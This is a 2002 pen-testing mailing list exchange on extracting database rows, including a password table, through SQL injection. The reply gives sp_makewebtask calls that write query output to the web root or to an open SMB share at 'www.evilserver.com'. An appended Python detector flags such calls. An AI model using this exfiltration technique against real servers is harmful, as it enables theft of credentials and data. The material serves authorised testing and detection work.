See if you can access sp_makewebtask. It builds an HTML table with the
output of your query. It's installed by default without any kind of access
control. It works like this:

sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM sysobjects WHERE xtype=''U'''

(I'm pretty sure in SQL Server to use quoted parameters inside of quotes you
double single quotes, not double quotes.)

You can even specify a UNC path for the output file, like this:

sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html', 'SELECT name FROM sysobjects WHERE xtype=''U'''

The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be received.

If that fails, you could use a Perl or Python script.

Kevin Spett
SPI Dynamics, Inc.

> ----- Original Message -----
> From: "mel" <meling@scan-associates.net>
> To: <pen-testat_private>
> Sent: Wednesday, March 20, 2002 3:24 AM
> Subject: SQL Injection - retrieving all rows
>
> > Hi,
> >
> > I've been able to enumerate over 50 plus tables in a recent pen-test,
> > now comes the hard part - I want to dump data from the most important
> > table that contains user names and passwords. However, the ASP app
> > that I exploit only returns one row at a time. Is there any way to
> > overcome this?
> >
> > I've been looking for apps that return multiple rows (such as search, etc.)
> > but to no avail. I've tried dumping asp codes using BULK INSERT, but
> > the command is only available for system account. Creating a stored
> > procedure does not seem to work as well :(
> >
> > Now, I'm thinking of writing a script that dumps the data one at a time,
> > but I would like the advice from fellow pen-testers first.
> >
> > Cheers,
> >
> > --mel
> >
> > ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities please see:
> > https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Mar 21 2002 - 08:42:38 PST
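
Detection-side example, added here and not part of the original posts: a small Python check that finds sp_makewebtask calls in captured SQL statements, reads the output-file argument while honoring the doubled-single-quote escaping mentioned in the reply, and separates UNC targets from local paths. The function names (`read_literal`, `inspect`, `scan`) are hypothetical, and the sample statements are constructed from the two calls quoted above.

```python
import re

CALL_RE = re.compile(r"\bsp_makewebtask\b", re.IGNORECASE)

def read_literal(sql, pos):
    """Return (value, end) for the next '...' literal at or after pos, or (None, pos).
    Inside a T-SQL literal, two single quotes ('') stand for one quote."""
    start = sql.find("'", pos)
    if start < 0:
        return None, pos
    out, i = [], start + 1
    while i < len(sql):
        if sql[i] != "'":
            out.append(sql[i])
            i += 1
        elif sql[i + 1:i + 2] == "'":      # doubled quote: escaped, stay inside
            out.append("'")
            i += 2
        else:                               # lone quote: literal ends here
            return "".join(out), i + 1
    return None, pos                        # unterminated literal

def inspect(sql):
    """Describe an sp_makewebtask call in one statement, or return None."""
    m = CALL_RE.search(sql)
    if m is None:
        return None
    outfile, end = read_literal(sql, m.end())
    query = read_literal(sql, end)[0] if outfile is not None else None
    if outfile is None:
        target = "unparsed"                 # call seen, argument not readable
    elif outfile.startswith(("\\\\", "//")):
        target = "unc"                      # output leaves the host over SMB
    else:
        target = "local"
    return {"target": target, "outputfile": outfile, "query": query}

# Constructed sample: statements as they might appear in a SQL trace.
SAMPLE = [
    r"sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM sysobjects WHERE xtype=''U'''",
    r"EXEC sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html', 'SELECT name FROM sysobjects WHERE xtype=''U'''",
    "SELECT name FROM sysobjects WHERE xtype='U'",
]

def scan(statements):
    """Return (index, finding) for every statement that calls the procedure."""
    return [(i, f) for i, s in enumerate(statements) if (f := inspect(s))]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE):
        print(idx, finding["target"], finding["outputfile"])
```

A finding with target "unc" is the case to alert on first, since the query output is written to a share outside the database host.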